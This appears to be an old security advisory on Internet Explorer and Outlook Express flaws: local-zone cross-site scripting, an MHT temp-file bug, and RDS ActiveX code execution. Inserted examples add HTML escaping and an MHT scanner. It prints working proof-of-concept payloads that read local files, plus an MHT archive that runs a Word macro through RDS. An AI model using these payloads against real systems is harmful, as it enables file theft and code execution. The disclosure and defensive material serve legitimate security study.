COMMAND
CSS, RDS, Outlook Express
SYSTEMS AFFECTED
Win32
PROBLEM
Shane Hird found the following. All these issues have been disclosed
to MS; however, no action has been taken, so one would assume they
have decided not to patch the following problems.
Cross site scripting issues have been known for quite a while now,
in fact a long time before the recent CERT advisory about the
matter. MS have had security measures in place for this ever
since they started displaying custom local 404 error messages and
others. Taken directly from
res://C:\WINDOWS\SYSTEM32\SHDOCLC.DLL/HTTP_404.HTM:
// Security precaution: must filter out "urlResult" and "displayresult"
forbiddenChars = new RegExp("[<>\'\"]", "g"); // Global search/replace
urlresult = urlresult.replace(forbiddenChars, "");
displayresult = displayresult.replace(forbiddenChars, "");
Obviously, because the page will be displaying remotely defined
strings in the local zone, MS have filtered out 'dangerous'
characters, which is fair enough. Without this security
precaution, this page and others could easily be exploited. In
fact, certain pages lack it and can be exploited, as will be shown
later, although they are a minor problem.
MK/RES LFN CSS Bug
==================
There are a few problems with the RES and MK (and probably other)
protocols in that they don't recognise the Temporary Internet
Files directory as the Internet zone when it is specified in the
short 8-character (8.3) format. I.e., the following will be opened
in the 'local' zone, whereas they would normally be opened in the
'Internet' zone if specified using the LFN (long file name).
"res://C:\Windows\Tempor~1\Content.IE5\XXXXXXX\dllfile.mid/htmlfile.htm"
"mk:@MSITStore:C:\Windows\Tempor~1\Content.IE5\XXXXXXX\chmfile.chm::/htmfile.htm"
This may not be much of an issue due to the fact that 'XXXXXXXX'
is a random string and pretty much impossible to guess. However,
Outlook places TEMP files in the TEMP directory (not the
Temporary Internet Files directory) and places temp HTM files in
the root of the Temporary Internet Files directory, so it is easy
to guess the location. And HTM files can be extracted and opened
(in the 'local' zone) from the likes of MID files, so this can be
exploited in a similar fashion to the Active Setup problem,
although it would simply be a CSS exploit (which can be
potentially serious, see later). There are various ways of
exploiting this through Outlook using various protocols and file
formats etc.; we won't list them here, but basically not using
a local temp directory and instead using a random Temporary
Internet Files directory would solve most of the problems.
Web Accessories CSS Bug
=======================
MS have released extensions to IE that allow viewing an image
list, URL list and document tree among other things. These
extensions are essentially just HTM files which parse the current
HTM file and display results using script, which is shown in the
local zone. Immediately one realises that this can be exploited
if we can define the strings which are displayed, which we can.
Each of the below lines will display a text file when one of the
extensions is used on the current HTM file. This is a typical
CSS bug, which can be exploited further with the use of RDS, see
later.
Document Tree Exploit:
<OBJECT ID="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>" CLASSID="CLSID:0"></OBJECT>
URL List Exploit:
<a href="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>"></a>
Image List Exploit:
<IMG src="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>">
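An added illustration, not code from the advisory: a model of the Web Accessories pattern in which strings harvested from an untrusted page are rendered into local-zone HTML, placed beside two defensive renderings, the SHDOCLC.DLL strip filter quoted earlier and full entity escaping. The collectImgSrcs and renderImageList* functions are simplified stand-ins (an assumption) for what the Image List accessory HTM file actually does, and the sample page is constructed.

```javascript
// Added example, not the advisory's code: a model of the Web Accessories
// pattern, where attribute strings harvested from an untrusted page are
// rendered into local-zone HTML, beside two defensive renderings: the
// SHDOCLC.DLL strip filter quoted earlier and full entity escaping.
// collectImgSrcs/renderImageList* are simplified stand-ins (assumption)
// for what the Image List accessory HTM file actually does.

// The HTTP_404.HTM approach: delete the four characters outright.
function stripForbidden(s) {
  return s.replace(/[<>'"]/g, "");
}

// Entity-escape every character with HTML meaning; the text survives intact.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Harvest IMG src attributes from raw markup (the accessory walks the DOM for these).
function collectImgSrcs(html) {
  const srcs = [];
  const re = /<img\b[^>]*\bsrc\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) srcs.push(m[1]);
  return srcs;
}

// Unsafe: the harvested text is concatenated straight into the output markup,
// so a src value that contains tags becomes live markup in the local zone.
function renderImageListUnsafe(srcs) {
  return "<ul>" + srcs.map((s) => `<li><a href="${s}">${s}</a></li>`).join("") + "</ul>";
}

// Safe: identical layout, but every harvested string passes through a filter
// first (escapeHtml by default; stripForbidden reproduces the 404 page's choice).
function renderImageListSafe(srcs, filter = escapeHtml) {
  return "<ul>" + srcs.map((s) => `<li><a href="${filter(s)}">${filter(s)}</a></li>`).join("") + "</ul>";
}

// Constructed sample page: one ordinary image and one whose src carries markup.
const SAMPLE_PAGE = '<img src="logo.gif"><img src="<script>probe()</script>">';
```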
MHT Temp File CSS Bug
=====================
A typical temp file vulnerability. IE5 (or one of them) introduced
the new 'Web Archive' format for storing web pages, which has the
extension MHT. IE5 essentially takes each file which is needed
for display of the page and encodes them sequentially into a single
MHT file in the format of a MIME message, 7bit and Base64 encoding
and all; it even has a 'From:' field. (This, by the way, makes it
difficult to send and receive MHT attachments because Outlook, or
perhaps the mail server, converts it into MSG format, completely
destroying the original file.)
When parsing the MHT file, IE extracts each file and places it
into a single locked TMP file, however if the file referenced is
in a frame or an IFRAME, the file is extracted and placed into
its own unlocked file in the local temp directory, with guessable
names, in fact, even definable names. An example exploit is
included with the note about RDS.
RDS ActiveX Control Bug
=======================
A new ActiveX control included with Visual Studio and probably
IIS and other databasey type applications. Anyway, when invoked in
the local zone one can avoid the 'ActiveX' warning by creating
business objects via DCOM using IP 127.0.0.1 instead of
'in-process', and from there take practically any action with
permissions dependent on the current DCOM settings and current
user. This works on default configurations of any Win machine
with RDS installed.
This example fires up MS word and runs a custom macro, which from
there you can take on any action at all. The example is included
as part of the MHT exploit, which will extract a file to the temp
directory and open it. Hopefully this won't get stuffed up by
any 'smart' mail server.
<------------------------ snip MHTExp.MHT --------------------->
From: <Saved by Microsoft Internet Explorer 5>
Subject: MHT Exploit
Date: Thu, 17 Feb 2000 19:31:45 +1000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0000_01BF797D.A014BDD0"
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
This is a multi-part message in MIME format.
------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: MHTEXploit
<html>
<head>
<title>MHT Exploit</title>
</head>
<frameset cols="*">
<frame name="local" src="file:Exploit.htm">
</frameset>
</html>
------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: file:Exploit.htm
<HTML>
<script language="VBScript"><!--
if location.protocol <> "file:" then
document.writeln("Exploiting MHT temp file vuln - Shane Hird")
'Note - Replace with required temp directory.
window.open("file://C:\Documents and Settings\Shane\Local Settings\Temp\Exploit.htm")
else
msgbox("Running in local context")
set rds = CreateObject("RDS.DataSpace")
set busobj = rds.CreateObject("Word.Application", "127.0.0.1")
busobj.visible = TRUE
Set NT = busobj.Templates(1).VBProject.VBComponents(1).CodeModule
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Public Sub Example()"
NT.InsertLines 2, " MsgBox (" + Chr(34) + "Example Code..." + Chr(34) + ")"
NT.InsertLines 3, "End Sub"
busobj.run "Normal.ThisDocument.Example"
NT.DeleteLines 1, NT.CountOfLines
set NT = Nothing
busobj.quit
window.close
end if
--></script>
------=_NextPart_000_0000_01BF797D.A014BDD0--
<---------------- snip MHTExp.mht ------------------->
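An added example, not part of the advisory: a scanner for MHT web archives that flags the conditions the MHT and RDS sections describe, namely a MIME part whose Content-Location uses the file: scheme, a frame whose src is a file: URL, and script that creates RDS.DataSpace. The MIME splitter is a minimal one written for this example, and the sample archive at the bottom is constructed rather than taken from the advisory.

```javascript
// Added example, not the advisory's code: scan an MHT archive for the
// conditions described above: a part whose Content-Location uses the
// file: scheme, a frame whose src is file:, and script that creates
// RDS.DataSpace. The MIME splitter is minimal and written for this
// example; the sample archive at the bottom is constructed.

function parseHeaders(block) {
  const headers = {};
  // Unfold continuation lines, then take "Name: value" pairs (names lowercased).
  for (const line of block.replace(/\r?\n[ \t]+/g, " ").split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

function splitMht(text) {
  const top = parseHeaders(text.slice(0, text.search(/\r?\n\r?\n/)));
  const m = /boundary="?([^";]+)"?/i.exec(top["content-type"] || "");
  if (!m) return [];
  const parts = [];
  for (const raw of text.split("--" + m[1]).slice(1)) {
    if (raw.startsWith("--")) break; // closing delimiter
    const cut = raw.search(/\r?\n\r?\n/);
    if (cut >= 0) parts.push({ headers: parseHeaders(raw.slice(0, cut).trim()), body: raw.slice(cut).trim() });
  }
  return parts;
}

function scanMht(text) {
  const findings = [];
  splitMht(text).forEach((p, n) => {
    const loc = p.headers["content-location"] || "";
    if (/^file:/i.test(loc)) findings.push(`part ${n}: file: Content-Location (${loc})`);
    if (/<i?frame\b[^>]*\bsrc\s*=\s*"?file:/i.test(p.body)) findings.push(`part ${n}: frame with file: src`);
    if (/RDS\.DataSpace/i.test(p.body)) findings.push(`part ${n}: RDS.DataSpace created in script`);
  });
  return findings;
}

// Constructed sample: an outer page framing a file: part that carries script.
const SAMPLE_MHT = [
  "MIME-Version: 1.0", "Content-Type: multipart/related;", '\tboundary="=_Part_Example"', "",
  "--=_Part_Example", "Content-Type: text/html", "Content-Location: Outer.htm", "",
  '<frameset cols="*"><frame name="local" src="file:Inner.htm"></frameset>',
  "--=_Part_Example", "Content-Type: text/html", "Content-Location: file:Inner.htm", "",
  '<script language="VBScript">set rds = CreateObject("RDS.DataSpace")</script>',
  "--=_Part_Example--",
].join("\r\n");
```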
Outlook Express ActiveX Exploit
===============================
There is also this old exploit which apparently got fixed in IE5,
but was never announced. It will allow reading of any file on the
user's machine (after the first newline of the file) using an
ActiveX control provided by Outlook Express.
<object id="MIME" classid="clsid:1C82EAD9-508E-11D1-8DCF-00C04FB951F9" width="500" height="150"></object>
<script language="Vbscript"><!--
msgbox("Please wait while control is loaded..." + Chr(10) + "Outlook Express MIME Editor Exploit" + Chr(10) + "Written by: Shane Hird")
MIME.src="C:\test.txt"
msgbox("File Loaded")
document.write("<P>File is displayed below</P><HR><PRE>")
document.write(MIME.messagesource)
--></script>
SOLUTION
Nothing yet.